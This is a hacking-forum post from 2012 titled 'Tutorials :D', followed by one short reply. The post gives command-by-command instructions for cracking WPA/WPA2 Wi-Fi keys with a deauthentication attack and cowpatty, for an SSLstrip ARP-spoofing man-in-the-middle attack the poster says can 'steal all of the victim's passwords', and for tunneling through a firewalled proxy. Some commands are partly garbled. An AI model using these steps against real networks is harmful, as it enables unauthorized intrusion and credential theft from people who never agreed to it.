World Wide HAcking Activities


Display results as :

Rechercher Advanced Search

Latest topics
» Multiclicker2-Selfish EARN $50 to $100 a Month Now!
Mon Apr 07 2014, 11:15 by ineedit2011

» Ninja Saga All Exam Hack + Reward Special Jounin Hard Mode
Sat Sep 07 2013, 15:19 by jonathan143

» NEW SFDFI AUTO KILL HACK [aug. 27,2012]
Sat Aug 17 2013, 09:16 by jhonaz16

» Special Force DFI Wall Hack
Fri May 24 2013, 01:26 by lh-myra

» DotA 2 :))
Tue May 21 2013, 10:00 by muhdhilmidx

» (R) Dragon City hack
Mon May 13 2013, 19:44 by nika

» Ninja Saga GODMODE Hack via C.E
Sat Apr 27 2013, 08:09 by jonathan143

» Internet Download Manager Patcher
Sat Mar 09 2013, 00:32 by nikojay1397

» CrossFire Fly Hack And Hell Hack
Thu Dec 06 2012, 16:14 by midppp

» Windows 8 Theme Our New Blog/Forum Site
Thu Nov 22 2012, 14:39 by Admin[Selfish]

Like Us!
Top posters
Admin[Selfish] (117)
zidaxxx (85)
iLy_Ekang (57)
meklove096402037 (51)
GreyPhantom (30)
royjaymart (27)
mranya (22)
vonjoevie (22)
D (19)
GodKnowsJhomz (18)

Top posting users this month

You are not connected. Please login or register

Tutorials :D

Go down  Message [Page 1 of 1]

1 Tutorials :D on Sat Aug 18 2012, 14:30



WPA/WPA2 PSK Cracking using Rainbowtables with Cowpatty

ifconfig wlan0 up

airmon-ng start wlan0

ifconfig -a

airodump-ng mon0

airodump-ng -c 11 –bssid 0C:3H:44:79:12 -w LINKSYS mon0

aireplay-ng -0 30 -a 0C:3H:44:79:12 -c 22:31:A7:9L:14 mon0


cowpatty -r LINKSYS -01.cap -d /root/Desktop/LINKSYS.wpa -s LINKSYS


What do the switches in these commands really mean?

-c after airodump-ng command = The channel the AP is located on

–bssid = The Mac Address of the AP you are attacking

-0 = Specifies to aireplay-ng that it will be a Deauth Atatck, “thats a zero by the way”

-c after aireplay-ng command specifies the client connected to the AP which you are attacking

./cowpatty = starts running cowpatty within Backtrack

-r = specifies the capture file you will be cracking using Cowpatty

-d = The directory of your RainBow Table you will be using for the attack. basically the location on your hard disk.


Connect to open Authentication Network using terminal

iwconfig wlan0 essid “LINKSYS”

“Note” This command needs to have the “Parenthesis” around the ESSID name to work


SSL Strip Tutorial

1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python -w secret

Once this setup is up and running perfectly, all of our victim’s traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim’s passwords sent supposedly over “SSL”


Setting up an HTTP Tunnel

On the home computer (server):

sshd (start the ssh server)

hts –forward-port localhost:22 80 (start the HTTP Tunnel server)

On the office computer (client):

htc –forward-port 900 –proxy HttpProxy:3128 HomeComputer:80 (start the HTTP Tunnel client)

ssh -L 800:pop3server:113 sshlogin@localhost -p 900 (start the ssh client)

Then read your email with your mail program at localhost:800

Notes on HTTP tunneling:

If your proxy requires authentication, add –proxy-authorization login:password to the htc command line.
sshlogin is your ssh login name on the ssh server on the Home computer.
You can set up as many additionnal tunnels as you want with:
ssh -L localport:destinationServer:destinationPort sshlogin@localhost -p 900
(localport is the local port you want to map to a destination server outside the firewall (destinationServer:destinationPort)).
Drawbacks of this solution:

it does not work for UDP-based protocols (NFS, chat…).
it does not work for programs which act as server (most games, chat, peer-to-peer…)
HTTP encapsulations and proxy delays can add some latency.
Good point of this solution:

Setting up the server is easy.
By using ports above 1024, setting up the client does not require administratror (root) privileges.
Multiple users can use the server to create multiple tunnels to any destination. Each user has its own private tunnels.
This tunnel can secure communications even if the proxy does not accept to proxy HTTPS.
This tunnel does not require the HTTP proxy to accept the CONNECT command.
This tunnel can work on proxies which are not capable of – or forbid – proxying of HTTPS (port 443).
With Linux Live CDs like Knoppix this can be a great solution for cybercafés: Live Linux CD ensures there is no lurking keylogger or troyan, and the tunnel ensures that the cybercafé owner, a troyaned computer or the government cannot sniff your passwords, spy on your data or censor websites. I especially think of China here.
Try this out it’s free as well [You must be registered and logged in to see this link.]

2 Re: Tutorials :D on Sat Aug 18 2012, 15:07


ausin mo kya ang tutorial XDD


Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum